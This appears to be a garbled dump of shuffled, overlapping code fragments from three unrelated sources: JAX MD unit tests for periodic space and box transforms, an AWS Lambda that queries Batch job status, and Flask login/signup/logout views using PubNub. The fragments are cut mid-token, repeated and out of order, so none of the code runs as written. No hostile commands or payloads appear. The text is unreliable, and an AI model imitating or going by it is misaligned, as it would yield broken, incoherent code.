'_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension': dim, 'dtype': dtype } for", "3) key, split_T1_scale, split_T1_dT = random.split(key, 3) key, split_t, split_R,", "E_g) # pylint: disable=invalid-name class SpaceTest(jtu.JaxTestCase): # pylint: disable=g-complex-comprehension @parameterized.named_parameters(jtu.cases_from_list(", "dtype in POSITION_DTYPE)) def test_periodic_general_dynamic(self, spatial_dimension, dtype): key = random.PRNGKey(0)", "0.0) dR_after = space.periodic_displacement(f32(1.0), R_shift - R) assert dR_after.dtype ==", "for _ in range(STOCHASTIC_SAMPLES): key, split1, split2 = random.split(key, 3)", "1.0, dim) box = dtype(box_size) if box_format == 'vector': box", "dtype=dtype) transform = jnp.diag(box_size) R = random.uniform( split2, (PARTICLE_COUNT, spatial_dimension),", "= space.periodic(box_size) general_disp_fn, general_shift_fn = space.periodic_general(transform) disp_fn = space.map_product(disp_fn) general_disp_fn", "SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def test_transform_inverse(self, spatial_dimension, dtype): key", "random.split(key, 3) key, split_T1_scale, split_T1_dT = random.split(key, 3) key, split_t,", "in BOX_FORMATS)) def test_periodic_general_grad_box(self, spatial_dimension, dtype, box_format): if box_format ==", "and jnp.all(unwrapped_R < 1)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension': dim,", "jnp.array([i, j, k], dtype=R.dtype) dr_shifted = space.distance(dR_shifted) dr_shifted = jnp.reshape(dr_shifted,", "R), jnp.array(true_disp_fn(R, R), dtype=dtype)) self.assertAllClose( shift_fn(R, dR, box=T_1), jnp.array(true_shift_fn(R, dR),", "make_periodic_general_test_system(N, dim, dtype, box_format): assert box_format in BOX_FORMATS box_size =", "range(-1, 2): for j in range(-1, 2): dR_shifted = dR", "random.uniform(split_T0_scale, ()) dtransform_0 = 0.5 * random.normal( split_T0_dT, (spatial_dimension, spatial_dimension))", "'matrix'] if FLAGS.jax_enable_x64: POSITION_DTYPE = [f32, f64] else: POSITION_DTYPE =", "box * 0.9 self.assertAllClose(E_gf(R_f, box=deformed_box), E_g(R, new_box=deformed_box)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name':", "1.0) assert jnp.all(R_shift > 0.0) dR_after = space.periodic_displacement(f32(1.0), R_shift -", "split1, split2 = random.split(key, 3) R = random.normal(split1, (PARTICLE_COUNT, spatial_dimension))", "split, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) R = shift(R, dR) unwrapped_R =", "in SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def test_periodic_against_periodic_general(self, spatial_dimension, dtype):", "split_T0_scale, split_T0_dT = random.split(key, 3) key, split_T1_scale, split_T1_dT = random.split(key,", "spatial_dimension), dtype=dtype) dR = space.map_product(space.pairwise_displacement)(R, R) dR_wrapped = space.periodic_displacement(f32(1.0), dR)", "R) ** 2) grad_direct = grad(energy_direct)(R_prime) grad_indirect = grad(energy_indirect, 1)(T,", "= random.split(key, 3) R = random.uniform( split1, (PARTICLE_COUNT, spatial_dimension), dtype=dtype)", "random.split(key) R = random.uniform( split, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) dR =", "** 2)) self.assertAllClose(grad_fn(R_scaled), general_grad_fn(R)) assert general_grad_fn(R).dtype == dtype @parameterized.named_parameters(jtu.cases_from_list( {", "test_util, quantity, energy from jax_md.util import * from functools import", "dtype=dtype) dR = jnp.where(dR > 0.49, f32(0.49), dR) dR =", "R = random.uniform( split1, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) dR = jnp.sqrt(f32(0.1))", "self.assertAllClose(metric(R, R), test_metric(R, R)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension':", "< dr_direct, dR_shifted, dR_direct) dr_direct = jnp.where( dr_shifted < dr_direct,", "= space.canonicalize_displacement_or_metric(displacement) metric = space.map_product(metric) test_metric = space.map_product(test_metric) for _", "test_periodic_against_periodic_general_grad(self, spatial_dimension, dtype): key = random.PRNGKey(0) tol = 1e-13 if", "Version 2.0 (the \"License\"); # you may not use this", "lambda T, R: jnp.sum(space.transform(T, R) ** 2) grad_direct = grad(energy_direct)(R_prime)", "dR_direct) dr_direct = jnp.where( dr_shifted < dr_direct, dr_shifted, dr_direct) dR_direct", "dtype=dtype)) self.assertAllClose( shift_fn(R, dR, box=T_1), jnp.array(true_shift_fn(R, dR), dtype=dtype)) @parameterized.named_parameters(jtu.cases_from_list( {", "for dtype in POSITION_DTYPE for box_format in BOX_FORMATS)) def test_periodic_general_deform_shift(self,", "+ jnp.array([i, j], dtype=R.dtype) dr_shifted = space.distance(dR_shifted) dr_shifted = jnp.reshape(dr_shifted,", "f32(0.49), dR) dR = jnp.where(dR < -0.49, f32(-0.49), dR) R_shift", "R0 = R unwrapped_R = R displacement, shift = space.periodic_general(T)", "2): dR_shifted = dR + jnp.array([i, j], dtype=R.dtype) dr_shifted =", "= 2e-5 for _ in range(STOCHASTIC_SAMPLES): key, split_R, split_T =", "dR_direct = jnp.where(dr_shifted < dr_direct, dR_shifted, dR_direct) dr_direct = jnp.where(dr_shifted", "absl.testing import absltest from absl.testing import parameterized from jax.config import", "box) d_gf, s_gf = space.periodic_general(box) d_g, s_g = space.periodic_general(box, fractional_coordinates=False)", "= 1e-5 for _ in range(STOCHASTIC_SAMPLES): key, split1, split2, split3", "make_periodic_general_test_system(N, spatial_dimension, dtype, box_format) R_new = s(R, grad(E)(R)) R_gf_new =", "random.uniform(key, (N, dim), dtype=dtype) R = space.transform(box, R_f) E =", "R) self.assertAllClose(R_prime_exact, R_prime) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}'.format(dim), 'spatial_dimension': dim }", "by applicable law or agreed to in writing, software #", "range(STOCHASTIC_SAMPLES): key, split1, split2 = random.split(key, 3) R = random.normal(", "JAX Issue #5849.') N = 16 R_f, R, box, (s,", "= jnp.array(size_1 * (eye + dtransform_1), dtype=dtype) disp_fn, shift_fn =", "import jax.numpy as jnp from jax import grad, jit, jacfwd", "for k in range(-1, 2): dR_shifted = dR + jnp.array([i,", "split = random.split(key) dR = random.normal( split, (PARTICLE_COUNT, spatial_dimension), dtype=dtype)", "in BOX_FORMATS)) def test_periodic_general_deform_shift(self, spatial_dimension, dtype, box_format): N = 16", "dR = random.normal( split, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) R = shift(R,", "box = dtype(box_size) if box_format == 'vector': box = jnp.array(jnp.ones(dim)", "j, k], dtype=R.dtype) dr_shifted = space.distance(dR_shifted) dr_shifted = jnp.reshape(dr_shifted, dr_shifted.shape", "box_format): N = 16 R_f, R, box, (s, E), (s_gf,", "= box * 0.9 self.assertAllClose(E_gf(R_f, box=deformed_box), E_g(R, new_box=deformed_box)) @parameterized.named_parameters(jtu.cases_from_list( {", "f32(-0.49), dR) R_shift = space.periodic_shift(f32(1.0), R, dR) assert R_shift.dtype ==", "space.transform(T, R) energy_direct = lambda R: jnp.sum(R ** 2) energy_indirect", "box_format == 'vector': box = jnp.array(jnp.ones(dim) * box_size, dtype) elif", "for dtype in POSITION_DTYPE)) def test_periodic_displacement(self, spatial_dimension, dtype): key =", "dr_shifted = jnp.reshape(dr_shifted, dr_shifted.shape + (1,)) dR_direct = jnp.where(dr_shifted <", "1e-5 for _ in range(STOCHASTIC_SAMPLES): key, split1, split2, split3 =", "self.assertAllClose(jacfwd(E_gf)(R_f, box=deformed_box), jacfwd(E_g)(R, new_box=deformed_box)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension': dim,", "@grad def box_energy_gf_fn(box): return E_gf(R_f, box=box) self.assertAllClose(box_energy_g_fn(box), box_energy_gf_fn(box)) if __name__", "< dr_direct, dR_shifted, dR_direct) dr_direct = jnp.where(dr_shifted < dr_direct, dr_shifted,", "space.map_product(test_metric) for _ in range(STOCHASTIC_SAMPLES): key, split1, split2 = random.split(key,", "key = random.PRNGKey(0) R_f = random.uniform(key, (N, dim), dtype=dtype) R", "(1,)) dR_direct = jnp.where( dr_shifted < dr_direct, dR_shifted, dR_direct) dr_direct", "space.transform(T_inv, space.transform(T, R)) self.assertAllClose(R, R_test) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__),", "E = jit(energy.soft_sphere_pair(d)) E_gf = jit(energy.soft_sphere_pair(d_gf)) E_g = jit(energy.soft_sphere_pair(d_g)) return", "def test_periodic_general_energy(self, spatial_dimension, dtype, box_format): N = 16 R_f, R,", "(s_g, E_g) # pylint: disable=invalid-name class SpaceTest(jtu.JaxTestCase): # pylint: disable=g-complex-comprehension", "key = random.PRNGKey(0) tol = 1e-13 if dtype is f32:", "applicable law or agreed to in writing, software # distributed", "dR) unwrapped_R = unwrapped_shift(unwrapped_R, dR) self.assertAllClose( displacement(R, R0), displacement(unwrapped_R, R0))", "in range(-1, 2): for k in range(-1, 2): dR_shifted =", "R_test) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension': dim, 'dtype': dtype", "jnp.array([i, j], dtype=R.dtype) dr_shifted = space.distance(dR_shifted) dr_shifted = jnp.reshape(dr_shifted, dr_shifted.shape", "space.periodic_general(transform) disp_fn = space.map_product(disp_fn) general_disp_fn = space.map_product(general_disp_fn) self.assertAllClose(disp_fn(R_scaled, R_scaled), general_disp_fn(R,", "R_new = s_g(R, grad(E_g)(R), new_box=deformed_box) R_gf_new = space.transform(deformed_box, s_gf(R_f, grad(E_gf)(R_f)))", "test_periodic_displacement(self, spatial_dimension, dtype): key = random.PRNGKey(0) for _ in range(STOCHASTIC_SAMPLES):", "dtype): key = random.PRNGKey(0) for _ in range(STOCHASTIC_SAMPLES): key, split", "dtype) elif box_format == 'matrix': box = jnp.array(jnp.eye(dim) * box_size,", "2)) self.assertAllClose(grad_fn(R_scaled), general_grad_fn(R)) assert general_grad_fn(R).dtype == dtype @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name':", "for dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def test_transform(self,", "self.assertAllClose(R_new, R_g_new) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension': dim, 'dtype': dtype,", "< dr_direct, dr_shifted, dr_direct) elif spatial_dimension == 3: for i", "def test_periodic_general_dynamic(self, spatial_dimension, dtype): key = random.PRNGKey(0) eye = jnp.eye(spatial_dimension)", "in POSITION_DTYPE)) def test_periodic_general_dynamic(self, spatial_dimension, dtype): key = random.PRNGKey(0) eye", "= jnp.eye(spatial_dimension, dtype=dtype) tol = 1e-13 if dtype is f32:", "dtype in POSITION_DTYPE)) def test_periodic_shift(self, spatial_dimension, dtype): key = random.PRNGKey(0)", "for dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def test_periodic_displacement(self,", "R) dR_wrapped = space.periodic_displacement(f32(1.0), dR) dR_direct = dR dr_direct =", "= dR + jnp.array([i, j], dtype=R.dtype) dr_shifted = space.distance(dR_shifted) dr_shifted", "unwrapped_R = R displacement, shift = space.periodic_general(T) _, unwrapped_shift =", "self.assertAllClose(grad(E)(R), grad(E_gf)(R_f)) self.assertAllClose(grad(E)(R), grad(E_g)(R)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension': dim,", "assert not (jnp.all(unwrapped_R > 0) and jnp.all(unwrapped_R < 1)) @parameterized.named_parameters(jtu.cases_from_list(", "3) R = random.normal( split1, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) self.assertAllClose(metric(R, R),", "# You may obtain a copy of the License at", "random.normal( split_T, (spatial_dimension, spatial_dimension), dtype=dtype) T = eye + dT", "split1, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) self.assertAllClose(metric(R, R), test_metric(R, R)) @parameterized.named_parameters(jtu.cases_from_list( {", "dtype): key = random.PRNGKey(0) displacement, _ = space.periodic_general(jnp.eye(spatial_dimension)) metric =", "jnp.array(size_1 * (eye + dtransform_1), dtype=dtype) disp_fn, shift_fn = space.periodic_general(T_0)", "self.assertAllClose(E(R), E_gf(R_f)) self.assertAllClose(E(R), E_g(R)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension': dim,", "split1, (spatial_dimension,), dtype=dtype) transform = jnp.diag(box_size) R = random.uniform( split2,", "d_gf, s_gf = space.periodic_general(box) d_g, s_g = space.periodic_general(box, fractional_coordinates=False) key", "R: jnp.sum(disp_fn(R, R) ** 2)) general_grad_fn = grad(lambda R: jnp.sum(general_disp_fn(R,", "space.periodic_general(T, wrapped=False) displacement = space.map_product(displacement) for _ in range(SHIFT_STEPS): key,", "dR = random.normal( split_dR, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) self.assertAllClose( disp_fn(R, R),", "\\ make_periodic_general_test_system(N, spatial_dimension, dtype, box_format) self.assertAllClose(grad(E)(R), grad(E_gf)(R_f)) self.assertAllClose(grad(E)(R), grad(E_g)(R)) @parameterized.named_parameters(jtu.cases_from_list(", "and # limitations under the License. \"\"\"Tests for jax_md.space.\"\"\" from", "s_g = space.periodic_general(box, fractional_coordinates=False) key = random.PRNGKey(0) R_f = random.uniform(key,", "self.assertAllClose(disp_fn(R_scaled, R_scaled), general_disp_fn(R, R)) assert disp_fn(R_scaled, R_scaled).dtype == dtype self.assertAllClose(", "dtype, box_format) deformed_box = box * 0.9 self.assertAllClose(grad(E_gf)(R_f, box=deformed_box), grad(E_g)(R,", "3) dT = random.normal( split_T, (spatial_dimension, spatial_dimension), dtype=dtype) T =", "2): dR_shifted = dR + jnp.array([i, j, k], dtype=R.dtype) dr_shifted", "jax_config.FLAGS PARTICLE_COUNT = 10 STOCHASTIC_SAMPLES = 10 SHIFT_STEPS = 10", "# limitations under the License. \"\"\"Tests for jax_md.space.\"\"\" from absl.testing", "R = random.normal( split1, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) T = random.normal(", "= grad(energy_direct)(R_prime) grad_indirect = grad(energy_indirect, 1)(T, R) self.assertAllClose(grad_direct, grad_indirect) @parameterized.named_parameters(jtu.cases_from_list(", "= jit(energy.soft_sphere_pair(d)) E_gf = jit(energy.soft_sphere_pair(d_gf)) E_g = jit(energy.soft_sphere_pair(d_g)) return R_f,", "dtype in POSITION_DTYPE)) def test_canonicalize_displacement_or_metric(self, spatial_dimension, dtype): key = random.PRNGKey(0)", "\"License\"); # you may not use this file except in", "assert dR_after.dtype == R.dtype self.assertAllClose(dR_after, dR) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim,", "= \\ make_periodic_general_test_system(N, spatial_dimension, dtype, box_format) self.assertAllClose(grad(E)(R), grad(E_gf)(R_f)) self.assertAllClose(grad(E)(R), grad(E_g)(R))", "unwrapped_shift = space.periodic_general(T, wrapped=False) displacement = space.map_product(displacement) for _ in", "} for dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE for", "(PARTICLE_COUNT, spatial_dimension), dtype=dtype) R_scaled = R * box_size dR =", "SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def test_periodic_general_dynamic(self, spatial_dimension, dtype): key", "box_format): if box_format == 'scalar': raise SkipTest('Scalar case fails due", "random.PRNGKey(0) for _ in range(STOCHASTIC_SAMPLES): key, split = random.split(key) R", "spatial_dimension)) R_prime = space.transform(T, R) energy_direct = lambda R: jnp.sum(R", "dtype in POSITION_DTYPE)) def test_periodic_general_wrapped_vs_unwrapped( self, spatial_dimension, dtype): key =", "= random.uniform(key, (N, dim), dtype=dtype) R = space.transform(box, R_f) E", "dR) dR = jnp.where(dR < -0.49, f32(-0.49), dR) R_shift =", "R = random.normal( split1, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) self.assertAllClose(metric(R, R), test_metric(R,", "if dtype is f32: tol = 2e-5 for _ in", "box_format in BOX_FORMATS)) def test_periodic_general_shift(self, spatial_dimension, dtype, box_format): N =", "spatial_dimension, dtype, box_format): N = 16 R_f, R, box, (s," ]
[ "<filename>functions/batch-custom-action/status-api/lambda.py import boto3 batch_client = boto3.client('batch') def lambda_handler(event, context): describe_response", "lambda_handler(event, context): describe_response = batch_client.describe_jobs( jobs=[ event.get('jobId', '')] ) return", "batch_client = boto3.client('batch') def lambda_handler(event, context): describe_response = batch_client.describe_jobs( jobs=[", "boto3 batch_client = boto3.client('batch') def lambda_handler(event, context): describe_response = batch_client.describe_jobs(", "= boto3.client('batch') def lambda_handler(event, context): describe_response = batch_client.describe_jobs( jobs=[ event.get('jobId',", "def lambda_handler(event, context): describe_response = batch_client.describe_jobs( jobs=[ event.get('jobId', '')] )", "context): describe_response = batch_client.describe_jobs( jobs=[ event.get('jobId', '')] ) return describe_response.get('jobs',", "describe_response = batch_client.describe_jobs( jobs=[ event.get('jobId', '')] ) return describe_response.get('jobs', [{}])[0].get('status',", "boto3.client('batch') def lambda_handler(event, context): describe_response = batch_client.describe_jobs( jobs=[ event.get('jobId', '')]", "= batch_client.describe_jobs( jobs=[ event.get('jobId', '')] ) return describe_response.get('jobs', [{}])[0].get('status', '')", "import boto3 batch_client = boto3.client('batch') def lambda_handler(event, context): describe_response =" ]
[ "Hydrosmart', form=form, error=error) @mod_auth.route('/signup', methods=['GET', 'POST']) def signup(): form =", "methods=['GET', 'POST']) def signup(): form = SignupForm(request.form) error = None", "app, _callback from .models import User from .forms import LoginForm,", "from app import db, login_manager, pubnub, app, _callback from .models", "not user: error = 'User does not exist' elif not", "def signup(): form = SignupForm(request.form) error = None if request.method", ".forms import LoginForm, SignupForm mod_auth = Blueprint('auth', __name__) @mod_auth.route('/login', methods=['GET',", "'POST': existing_user = db.users.find_one({'username' : request.form['username']}) if existing_user: error =", "exist' elif not check_password_hash(user['password'], request.form['password']): error = 'Invalid credentials. Please", "login(): form = LoginForm(request.form) error = None print(request.method) if request.method", "'POST']) def signup(): form = SignupForm(request.form) error = None if", "generate_password_hash from app import db, login_manager, pubnub, app, _callback from", "'Username already exists' else: new_user = {'username' : request.form['username'], 'email'", "== 'POST': user = db.users.find_one({'username': request.form['username']}) if not user: error", "@login_manager.unauthorized_handler def unauthorized_callback(): return redirect('/login') @login_manager.user_loader def load_user(username): u =", "from flask import Blueprint, render_template, redirect, url_for, request, flash from", "'User does not exist' elif not check_password_hash(user['password'], request.form['password']): error =", "else: user_obj = User(user['username']) login_user(user_obj) return redirect(url_for('devices.list_devices')) return render_template('auth/login.html', title='Log", "SignupForm(request.form) error = None if request.method == 'POST': existing_user =", "= None if request.method == 'POST': existing_user = db.users.find_one({'username' :", "= 'Username already exists' else: new_user = {'username' : request.form['username'],", "def logout(): logout_user() flash(\"Logged out.\") return redirect('/login') @login_manager.unauthorized_handler def unauthorized_callback():", "render_template('auth/login.html', title='Log In to Hydrosmart', form=form, error=error) @mod_auth.route('/signup', methods=['GET', 'POST'])", "request.form['username'], 'email' : request.form['email'], 'zip' : request.form['zip'], 'password' : generate_password_hash(request.form['password'])}", "login_user(user_obj) return redirect(url_for('devices.list_devices')) return render_template('auth/login.html', title='Log In to Hydrosmart', form=form,", "u = db.users.find_one({'username': username}) if not u: return None return", "try again.' else: user_obj = User(user['username']) login_user(user_obj) return redirect(url_for('devices.list_devices')) return", "request.form['email'], 'zip' : request.form['zip'], 'password' : generate_password_hash(request.form['password'])} db.users.insert_one(new_user) user =", "__name__) @mod_auth.route('/login', methods=['GET', 'POST']) def login(): form = LoginForm(request.form) error", "= db.users.find_one({'username': request.form['username']}) pubnub.channel_group_add_channel(channel_group=app.config['PUBNUB_CHANNEL_GRP'], channel=user['username']) pubnub.grant(channel=user['username'], auth_key=app.config['PUBNUB_AUTH_KEY'], read=True, write=True, manage=True,", "pubnub.grant(channel=user['username'], auth_key=app.config['PUBNUB_AUTH_KEY'], read=True, write=True, manage=True, ttl=0) return redirect(url_for('dashboard.dashboard')) return render_template('auth/signup.html',", "db.users.find_one({'username' : request.form['username']}) if existing_user: error = 'Username already exists'", ": request.form['username']}) if existing_user: error = 'Username already exists' else:", "error = None print(request.method) if request.method == 'POST': user =", "unauthorized_callback(): return redirect('/login') @login_manager.user_loader def load_user(username): u = db.users.find_one({'username': username})", "pubnub, app, _callback from .models import User from .forms import", "from .forms import LoginForm, SignupForm mod_auth = Blueprint('auth', __name__) @mod_auth.route('/login',", "= db.users.find_one({'username' : request.form['username']}) if existing_user: error = 'Username already", "= Blueprint('auth', __name__) @mod_auth.route('/login', methods=['GET', 'POST']) def login(): form =", "@login_manager.user_loader def load_user(username): u = db.users.find_one({'username': username}) if not u:", "'email' : request.form['email'], 'zip' : request.form['zip'], 'password' : generate_password_hash(request.form['password'])} db.users.insert_one(new_user)", "= None print(request.method) if request.method == 'POST': user = db.users.find_one({'username':", "flash from flask.ext.login import login_required, login_user, logout_user from werkzeug import", "login_required, login_user, logout_user from werkzeug import check_password_hash, generate_password_hash from app", "'zip' : request.form['zip'], 'password' : generate_password_hash(request.form['password'])} db.users.insert_one(new_user) user = db.users.find_one({'username':", "Hydrosmart', error=error) # @mod_auth.route('/googlelogin', methods=['GET', 'POST']) @mod_auth.route(\"/logout\") @login_required def logout():", "db, login_manager, pubnub, app, _callback from .models import User from", "out.\") return redirect('/login') @login_manager.unauthorized_handler def unauthorized_callback(): return redirect('/login') @login_manager.user_loader def", "= db.users.find_one({'username': request.form['username']}) if not user: error = 'User does", "def unauthorized_callback(): return redirect('/login') @login_manager.user_loader def load_user(username): u = db.users.find_one({'username':", "already exists' else: new_user = {'username' : request.form['username'], 'email' :", "render_template, redirect, url_for, request, flash from flask.ext.login import login_required, login_user,", "def load_user(username): u = db.users.find_one({'username': username}) if not u: return", "= LoginForm(request.form) error = None print(request.method) if request.method == 'POST':", "check_password_hash(user['password'], request.form['password']): error = 'Invalid credentials. Please try again.' else:", "write=True, manage=True, ttl=0) return redirect(url_for('dashboard.dashboard')) return render_template('auth/signup.html', form=form, title='Sign Up", "'password' : generate_password_hash(request.form['password'])} db.users.insert_one(new_user) user = db.users.find_one({'username': request.form['username']}) pubnub.channel_group_add_channel(channel_group=app.config['PUBNUB_CHANNEL_GRP'], channel=user['username'])", "@mod_auth.route(\"/logout\") @login_required def logout(): logout_user() flash(\"Logged out.\") return redirect('/login') @login_manager.unauthorized_handler", "'POST']) @mod_auth.route(\"/logout\") @login_required def logout(): logout_user() flash(\"Logged out.\") return redirect('/login')", "logout_user() flash(\"Logged out.\") return redirect('/login') @login_manager.unauthorized_handler def unauthorized_callback(): return redirect('/login')", "Blueprint, render_template, redirect, url_for, request, flash from flask.ext.login import login_required,", "import check_password_hash, generate_password_hash from app import db, login_manager, pubnub, app,", "check_password_hash, generate_password_hash from app import db, login_manager, pubnub, app, _callback", "generate_password_hash(request.form['password'])} db.users.insert_one(new_user) user = db.users.find_one({'username': request.form['username']}) pubnub.channel_group_add_channel(channel_group=app.config['PUBNUB_CHANNEL_GRP'], channel=user['username']) pubnub.grant(channel=user['username'], auth_key=app.config['PUBNUB_AUTH_KEY'],", "logout(): logout_user() flash(\"Logged out.\") return redirect('/login') @login_manager.unauthorized_handler def unauthorized_callback(): return", "if request.method == 'POST': existing_user = db.users.find_one({'username' : request.form['username']}) if", "db.users.find_one({'username': request.form['username']}) pubnub.channel_group_add_channel(channel_group=app.config['PUBNUB_CHANNEL_GRP'], channel=user['username']) pubnub.grant(channel=user['username'], auth_key=app.config['PUBNUB_AUTH_KEY'], read=True, write=True, manage=True, ttl=0)", "request.form['password']): error = 'Invalid credentials. Please try again.' else: user_obj", "= 'User does not exist' elif not check_password_hash(user['password'], request.form['password']): error", "<reponame>ifaraag/app<filename>app/auth/views.py<gh_stars>0 from flask import Blueprint, render_template, redirect, url_for, request, flash", "app import db, login_manager, pubnub, app, _callback from .models import", "LoginForm(request.form) error = None print(request.method) if request.method == 'POST': user", "manage=True, ttl=0) return redirect(url_for('dashboard.dashboard')) return render_template('auth/signup.html', form=form, title='Sign Up for", "return render_template('auth/signup.html', form=form, title='Sign Up for Hydrosmart', error=error) # @mod_auth.route('/googlelogin',", "else: new_user = {'username' : request.form['username'], 'email' : request.form['email'], 'zip'", "pubnub.channel_group_add_channel(channel_group=app.config['PUBNUB_CHANNEL_GRP'], channel=user['username']) pubnub.grant(channel=user['username'], auth_key=app.config['PUBNUB_AUTH_KEY'], read=True, write=True, manage=True, ttl=0) return redirect(url_for('dashboard.dashboard'))", "for Hydrosmart', error=error) # @mod_auth.route('/googlelogin', methods=['GET', 'POST']) @mod_auth.route(\"/logout\") @login_required def", "title='Log In to Hydrosmart', form=form, error=error) @mod_auth.route('/signup', methods=['GET', 'POST']) def", "error = 'Invalid credentials. Please try again.' else: user_obj =", "new_user = {'username' : request.form['username'], 'email' : request.form['email'], 'zip' :", "Please try again.' else: user_obj = User(user['username']) login_user(user_obj) return redirect(url_for('devices.list_devices'))", "login_user, logout_user from werkzeug import check_password_hash, generate_password_hash from app import", "= {'username' : request.form['username'], 'email' : request.form['email'], 'zip' : request.form['zip'],", "In to Hydrosmart', form=form, error=error) @mod_auth.route('/signup', methods=['GET', 'POST']) def signup():", "if not user: error = 'User does not exist' elif", "to Hydrosmart', form=form, error=error) @mod_auth.route('/signup', methods=['GET', 'POST']) def signup(): form", "{'username' : request.form['username'], 'email' : request.form['email'], 'zip' : request.form['zip'], 'password'", "user: error = 'User does not exist' elif not check_password_hash(user['password'],", "credentials. Please try again.' else: user_obj = User(user['username']) login_user(user_obj) return", "redirect(url_for('devices.list_devices')) return render_template('auth/login.html', title='Log In to Hydrosmart', form=form, error=error) @mod_auth.route('/signup',", ": request.form['zip'], 'password' : generate_password_hash(request.form['password'])} db.users.insert_one(new_user) user = db.users.find_one({'username': request.form['username']})", "does not exist' elif not check_password_hash(user['password'], request.form['password']): error = 'Invalid", "return None return User(u['username']) def callback(message, channel): db.data.insert_one(message) def error(message):", "flask import Blueprint, render_template, redirect, url_for, request, flash from flask.ext.login", "@mod_auth.route('/googlelogin', methods=['GET', 'POST']) @mod_auth.route(\"/logout\") @login_required def logout(): logout_user() flash(\"Logged out.\")", "methods=['GET', 'POST']) def login(): form = LoginForm(request.form) error = None", "signup(): form = SignupForm(request.form) error = None if request.method ==", "mod_auth = Blueprint('auth', __name__) @mod_auth.route('/login', methods=['GET', 'POST']) def login(): form", "form=form, title='Sign Up for Hydrosmart', error=error) # @mod_auth.route('/googlelogin', methods=['GET', 'POST'])", "@mod_auth.route('/login', methods=['GET', 'POST']) def login(): form = LoginForm(request.form) error =", "werkzeug import check_password_hash, generate_password_hash from app import db, login_manager, pubnub,", "import db, login_manager, pubnub, app, _callback from .models import User", "user = db.users.find_one({'username': request.form['username']}) if not user: error = 'User", "flask.ext.login import login_required, login_user, logout_user from werkzeug import check_password_hash, generate_password_hash", "load_user(username): u = db.users.find_one({'username': username}) if not u: return None", "u: return None return User(u['username']) def callback(message, channel): db.data.insert_one(message) def", "import login_required, login_user, logout_user from werkzeug import check_password_hash, generate_password_hash from", "error=error) @mod_auth.route('/signup', methods=['GET', 'POST']) def signup(): form = SignupForm(request.form) error", "auth_key=app.config['PUBNUB_AUTH_KEY'], read=True, write=True, manage=True, ttl=0) return redirect(url_for('dashboard.dashboard')) return render_template('auth/signup.html', form=form,", "form = LoginForm(request.form) error = None print(request.method) if request.method ==", "existing_user = db.users.find_one({'username' : request.form['username']}) if existing_user: error = 'Username", "_callback from .models import User from .forms import LoginForm, SignupForm", "error=error) # @mod_auth.route('/googlelogin', methods=['GET', 'POST']) @mod_auth.route(\"/logout\") @login_required def logout(): logout_user()", "existing_user: error = 'Username already exists' else: new_user = {'username'", "redirect('/login') @login_manager.user_loader def load_user(username): u = db.users.find_one({'username': username}) if not", "import Blueprint, render_template, redirect, url_for, request, flash from flask.ext.login import", "methods=['GET', 'POST']) @mod_auth.route(\"/logout\") @login_required def logout(): logout_user() flash(\"Logged out.\") return", "SignupForm mod_auth = Blueprint('auth', __name__) @mod_auth.route('/login', methods=['GET', 'POST']) def login():", "from flask.ext.login import login_required, login_user, logout_user from werkzeug import check_password_hash,", "return redirect(url_for('dashboard.dashboard')) return render_template('auth/signup.html', form=form, title='Sign Up for Hydrosmart', error=error)", "'POST': user = db.users.find_one({'username': request.form['username']}) if not user: error =", "username}) if not u: return None return User(u['username']) def callback(message,", "request.method == 'POST': user = db.users.find_one({'username': request.form['username']}) if not user:", "request.form['username']}) if existing_user: error = 'Username already exists' else: new_user", "def login(): form = LoginForm(request.form) error = None print(request.method) if", "not exist' elif not check_password_hash(user['password'], request.form['password']): error = 'Invalid credentials.", "# @mod_auth.route('/googlelogin', methods=['GET', 'POST']) @mod_auth.route(\"/logout\") @login_required def logout(): logout_user() flash(\"Logged", "= User(user['username']) login_user(user_obj) return redirect(url_for('devices.list_devices')) return render_template('auth/login.html', title='Log In to", "request.form['username']}) if not user: error = 'User does not exist'", "exists' else: new_user = {'username' : request.form['username'], 'email' : request.form['email'],", "form = SignupForm(request.form) error = None if request.method == 'POST':", "redirect(url_for('dashboard.dashboard')) return render_template('auth/signup.html', form=form, title='Sign Up for Hydrosmart', error=error) #", "form=form, error=error) @mod_auth.route('/signup', methods=['GET', 'POST']) def signup(): form = SignupForm(request.form)", "read=True, write=True, manage=True, ttl=0) return redirect(url_for('dashboard.dashboard')) return render_template('auth/signup.html', form=form, title='Sign", "return render_template('auth/login.html', title='Log In to 